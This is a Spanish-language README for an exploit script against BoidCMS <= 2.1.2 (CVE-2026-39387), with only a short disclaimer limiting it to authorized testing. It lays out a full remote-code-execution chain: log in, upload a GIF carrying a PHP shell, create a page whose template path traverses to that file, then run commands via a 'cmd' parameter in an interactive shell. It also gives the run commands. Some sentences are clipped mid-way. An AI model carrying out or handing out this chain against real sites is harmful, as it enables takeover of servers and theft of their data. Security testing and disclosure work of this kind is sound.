
Exploit RCE para BoidCMS <= 2.1.2
BoidCMS <= 2.1.2 permite a un atacante autenticado lograr la Ejecución Remota de Código (RCE) combinando dos vulnerabilidades:
image/gif) sin validar el contenido real del archivo, lo que permite que código PHP incrustado en un archivo GIF sea almacenado en el servidor.tpl controlado por el usuario que se resuelve de forma relativa al directorio de temas sin saneamiento, lo que permite el path traversal (p. ej. ../../media/shell.gif) para apuntar la plantilla de una página al archivo subido.Cuando la página manipulada se renderiza, el intérprete de PHP ejecuta la carga útil incrustada.
| Campo | Valor |
|---|---|
| Software | BoidCMS |
| Versiones | <= 2.1.2 |
| CVE | CVE-2026-39387 |
python3 CVE-2026-39387.py -u <target_url> -l <username> -p <password>
python3 CVE-2026-39387.py -u http://target.com -l admin -p password123
Una vez que el exploit se completa, se proporciona un prompt de shell interactivo (cmd >>) para la ejecución de comandos en el host remoto.
1. Login → POST /admin (con token CSRF)
2. Subir shell → POST /admin?page=media (shell.gif con carga útil PHP)
3. Crear página → POST /admin?page=create (tpl=../../media/shell.gif)
4. Ejecutar shell → GET /<permalink>?cmd=<comando>
pip install requests
Este exploit se proporciona únicamente con fines educativos y para pruebas de seguridad autorizadas. El uso no autorizado contra sistemas que no posees o para los que no tienes permiso explícito es ilegal y poco ético.
| Flag | Descripción | Ejemplo |
|---|
-u, --url | URL base del sitio BoidCMS objetivo | http://target.com |
-l, --user | Nombre de usuario administrador | admin |
-p, --passwd | Contraseña del administrador | password123 |